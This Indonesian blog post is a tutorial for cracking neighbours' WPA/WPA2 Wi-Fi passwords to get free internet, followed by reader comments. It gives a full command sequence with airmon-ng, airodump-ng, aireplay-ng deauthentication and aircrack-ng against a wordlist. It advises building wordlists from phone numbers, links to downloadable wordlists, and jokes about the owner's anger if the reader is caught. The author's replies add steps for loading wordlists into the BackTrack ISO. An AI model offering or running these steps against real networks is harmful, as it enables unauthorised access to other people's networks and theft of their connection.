Daftar di PayPal, lalu mulai terima pembayaran menggunakan kartu kredit secara instan.
Selamat datang di blog ivonk11 new all software free and full version, jika ada kekurangan jangan lupa commentnya biar ivonk11 bisa segera memperbaikinya.

berbagi sedikit tentang backtrack

ID BackTrack | Tutorial BackTrack Indonesia
sebelumnya salam persahabatan...!!!  bagi para sobat2 mania yg pengen internetan gratis caranya cukup mudah  tapi hati2 ya ntar mpunya marah low ketauan...he..he..he..he..he..he langsung aja......!!!
1. siapkan alfa AWUS036H atau sejenis prangkat wireless lainnya
2. siapkan backtrack....;jika anda belum punya backtrack silahkan klik disini
untuk membakar/ngeburn backtrack menjadi cd/dvd anda bisa pakek ultra ISO jika lum punya klik disana
low cd/dvd dah siap..masukkan cd/dvd ke pc  lalu restart
dan untuk mengetahui caranya menjalankan backtrack silahkan disini , disana , disitu

yang kesulitan mendownload lihat dulu disini
                       oke langsung saja
pada bt3 pada menu pilih nomer 3
pada bt4 ketik startx  pada perintah pertama tunggu loadingnya....
1. buka konsole ketik airmon-ng   terus di  enter
2. airodump-ng wlan0   enter  bila signal dah banyak yg keluar skarang kita stop  dengan mnekan ctrl+c
3. buka konsole baru
4. airodump-ng -c 11 -w afaqshamel -- bssid [ nomer bssid yg mau d hacking ] wlan0
angka 11 d atas itu menunjukkan channel wireless yg mau di hacking
untuk mengcrack wpa/wpa2 kita harus mengeluarkah handshake yg mau di hacking >.dengan cara
5. buka konsole baru
6. aireplay-ng -0 1 -a [nomer bssid yg mau d hacking] wlan0     terus  enter
7.  aireplay-ng -0 1 -a [nomer bssid yg mau d hacking] -c nomer station wlan0    terus enter
nah low handshake dah keluar skarang saatnya kita mengcrack/mencari key signal tetangga dengan cara
8.aircrack-ng afaqshamel-01.cap -w /root/wordlist yg anda bikin.txt    terus enter
dengan catatan wordlist di tarok di root/desktop
wordlist adalah [ acakan kata2/number/nomer hp siapa tau key wpa yg mau kita hacking tertera dalam wordlist yg kita bikin ]
kesimpulannya berhasil tidaknya kita nge crack wpa/wpa2 tergantung pada kita punya wordlist jadi  pandai2lah  kita membikinnya .......; cara bikinnya bisa di notepad asalkan gak capek..hikz..hikz..hikz
jika ingin bikin wordlist yang mudah download nowklik disini
@@ untuk anda yg di saudi anda bisa download wordlist nomer hp di aljawal  , stc , lana @@



semoga bermanfaat and semoga sukses
¤¤¤™™™ ivonk11.blogspot.com ™™™¤¤¤

20 postkan komentar anda disini:

bomotjawa mengatakan...

sirah ku nganti mumet boss,key jg blm di temukan...he2...

ivonk11 mengatakan...

low mumet minum panadol ....ntar ru bisa ketemu tu keynya...hikz...hikz...hikz....!!!

budywonk mengatakan...

mana panduan untuk wordlist nya kok ga ada gan....

ivonk11 mengatakan...

budywonk@ untuk panduannya anda bisa ke http://adf.ly/1QH7d atau http://adf.ly/1QHMa atau http://adf.ly/1QHQc semoga berhasil...!!!

ivonk11 mengatakan...

:-D

budywonk mengatakan...

tambah keyen skrang brow......tunjukan aksimu....gkgkgkgkgkkgkkgk

ivonk11 mengatakan...

emangnya da lomba nge dance kok pakek aksi2 segala...agagagagagagaaaggaaagaaa....!!! keren dah biasa namanya laki2 broooo...low cewek cantik...!!! hikz...hikz...hikz

budywonk mengatakan...

kan sponsor djarum 76 tunjukan aksimu..........gkggkgkgkgkgkgkgk

ivonk11 mengatakan...

ooo begitu....!!!! tapi sayang di mekkah gak ada djarum 76 broooooo...hikz...hikz...hikz

ali mustofa mengatakan...

bos DVD windowsnya eror ... minta copian lagi sukron

ivonk11 mengatakan...

oke tunggu aja tanggal mainnya... kalau bisa dvdnya bawa yang biasa aja<<<

Edi Sugiono mengatakan...

gan q minta tolong dong ,toong jelasin bagaimana caranya memasukan wordlist yang saya punya kedalam backtrack 4

syah putra mengatakan...

askum gan lam knal ya?mf,ngmong" mna nih cra yg mo di copy paste yg tuk buat bka wpa?tuk bs dbuka lwat EWSA,please pncrahanxa scara detail gan ya?tuk ssudah n sblumxa aq ucapkan tq bnget n skses slalu buat agan..................!

syah putra mengatakan...

askum bang ivonk,lam knal ya?mo txa nih bang,itu worldlist al jawal,stc,lana.isixa sma ato gmn bang.bgtu aq dwnload koq judulxa 2juta smua,sblum n ssudahxa,aq ucapin thnks bnget bang.skses slalu buat nte..............!

ivonk11 mengatakan...

untuk syah putra biar listnya tambah lengkap silahkan klik ini http://adf.ly/1QEnP

ivonk11 mengatakan...

untuk mas edy jika anda ingin memasukkan list caranya
1. buka bt anda yg berbentuk iso dengan ultra iso
2. biikin folder baru di casper ( terserah mau kasih nama apa aja )
3. di casper sebelah kiri ada bacaan new folder di rename sesuai nama folder yg anda bikin barusan
4.buka/klik folder yg anda bikin, tentunya kosong
5. tarik wordlist yang mau anda masukkan
6. jika wordlist sudah masuk silahkan anda save as dulu hasil editan anda
7. jika save as dah kelar matikan ultra isonya
8. buka hasil editannya anda dan bakar ke DVD
9. BT sudah siaaap tempuuuurrr and enjooooyyyy

sebelumnya mintaa maaf jika terlambat jawab coz adminnya sibuk and makasih dah berkunjung

Anonim mengatakan...

Assalamu'alaikum bos, OS nya apa? Windows bisa gak?

ivonk11 mengatakan...

yuuupz....!!! windows juga bisa bro......!!!!

Anonim mengatakan...

assalamualaikum wr wb...bank ivonk share lagi dunk wordlist,

eroonk babarian mengatakan...

halo bang ivonk,,,lam knl yaa,,gmn nih crx dptin nvidia

Poskan Komentar

ARTIKEL TERKAIT

Template by:

http://adf.ly/1PZoO